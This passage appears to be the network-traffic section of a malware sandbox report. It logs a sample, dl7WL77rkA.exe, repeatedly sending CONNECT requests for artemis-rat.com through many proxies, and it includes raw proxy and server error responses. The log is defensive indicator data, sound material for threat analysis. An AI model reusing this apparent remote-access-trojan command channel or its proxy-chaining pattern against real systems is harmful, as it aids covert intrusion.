                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.092871904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1527192.168.2.554094163.172.129.251163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.878737926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.607986927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514638901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.311554909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.900506020 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1528192.168.2.55369580.169.243.23410803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.934174061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1529192.168.2.549987162.241.6.97633603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.937077045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014290094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1530192.168.2.553719194.4.50.60123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.939167023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1531192.168.2.554105202.131.65.110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.939169884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.266884089 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1532192.168.2.54998992.204.134.3893753876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.939554930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1533192.168.2.552721153.19.91.77803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.940032005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092468977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.202038050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.931569099 CET804INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:17 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 612
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 73 63 40 67 63 69 2e 67 64 79 6e 69 61 2e 70 6c 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ssc@gci.gdynia.pl to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:52.469439030 CET804INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:17 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 612
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 73 63 40 67 63 69 2e 67 64 79 6e 69 61 2e 70 6c 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ssc@gci.gdynia.pl to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1534192.168.2.549952176.241.143.19780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.941252947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092458010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.202019930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.109069109 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1535192.168.2.554155172.67.181.197803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.961136103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.115636110 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1536192.168.2.553635149.34.210.6290903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.970967054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092662096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1537192.168.2.554123154.12.178.107299853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.990813017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1538192.168.2.553731161.97.147.193196553876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.002625942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014503002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108208895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.217164993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1539192.168.2.554221188.114.99.171803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.008536100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.164302111 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
